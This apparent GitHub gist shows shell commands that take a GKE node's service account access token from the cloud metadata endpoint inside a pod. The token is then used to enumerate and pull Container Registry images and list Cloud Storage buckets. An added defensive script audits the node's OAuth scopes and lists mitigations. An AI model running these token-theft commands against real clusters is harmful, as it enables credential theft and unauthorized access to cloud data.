Last active May 12, 2020 23:55
Lateral movement in GKE Pod using Cloud metadata endpoint
# Get a temporary access token for the node's default service account from the
# Google Cloud instance metadata endpoint (reachable from a pod when metadata is not concealed)
export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \
  jq -r '.access_token')

# List all repositories in Google Container Registry using the access token
curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog

# Docker login with the same token
echo "$TOKEN" | docker login --username oauth2accesstoken --password-stdin eu.gcr.io

# Pull an image (replace the placeholder with a name from the catalog output)
docker pull eu.gcr.io/<image-from-catalog>

# Check the OAuth scopes associated with the default service account
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
# https://www.googleapis.com/auth/compute
# https://www.googleapis.com/auth/devstorage.read_only
# https://www.googleapis.com/auth/service.management
# https://www.googleapis.com/auth/servicecontrol
# https://www.googleapis.com/auth/logging.write
# https://www.googleapis.com/auth/monitoring

# https://www.googleapis.com/auth/devstorage.read_only can be used to access GCS buckets
gsutil ls

# Read more
# https://cloud.google.com/storage/docs/authentication
# https://cloud.google.com/container-registry/docs/advanced-authentication
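The scopes listed above are what make the token useful beyond the node itself, so a defender's first check is to compare the scopes actually granted to the node service account against the set the cluster is supposed to need. The following audit script is an added example and is not part of the original gist; the SAMPLE_SCOPES value is a constructed copy of the scope list shown above (in practice you would feed it the live output of the scopes endpoint), and the EXPECTED_SCOPES baseline is an assumed, deliberately narrow policy that an operator would replace with their own.

```shell
#!/bin/sh
# Added example: flag OAuth scopes on a GKE node service account that fall
# outside an operator-defined baseline. Not from the original gist.

# Constructed sample input: the scope list as printed by the metadata endpoint
# in the gist above. Replace with:
#   curl -H "Metadata-Flavor: Google" \
#     http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
SAMPLE_SCOPES='https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/service.management
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring'

# Assumed baseline policy (hypothetical): only telemetry scopes are tolerated on
# the node service account; everything else must be justified and reviewed.
EXPECTED_SCOPES='https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring'

# is_expected <scope>: exact match against the baseline (no substring matching,
# so .../auth/logging is not confused with .../auth/logging.write)
is_expected() {
    for e in $EXPECTED_SCOPES; do
        if [ "$e" = "$1" ]; then
            return 0
        fi
    done
    return 1
}

# unexpected_scopes "<newline-separated scopes>": prints each scope not in the baseline
unexpected_scopes() {
    for s in $1; do
        if ! is_expected "$s"; then
            echo "$s"
        fi
    done
}

# count_unexpected_scopes "<newline-separated scopes>": prints the number of flagged scopes
count_unexpected_scopes() {
    n=0
    for s in $(unexpected_scopes "$1"); do
        n=$((n + 1))
    done
    echo "$n"
}

# Report: list the scopes that need review, then a summary line
unexpected_scopes "$SAMPLE_SCOPES" | sed 's/^/REVIEW: /'
echo "unexpected scopes: $(count_unexpected_scopes "$SAMPLE_SCOPES")"
```

Run it on a node (or on captured scope output) and treat every REVIEW line as a finding: the gist shows that compute and devstorage scopes on the node account are what turn a single pod compromise into registry and bucket access, so shrinking the scope set, moving workloads to Workload Identity, and blocking pod access to the metadata endpoint are the mitigations to pair with this check.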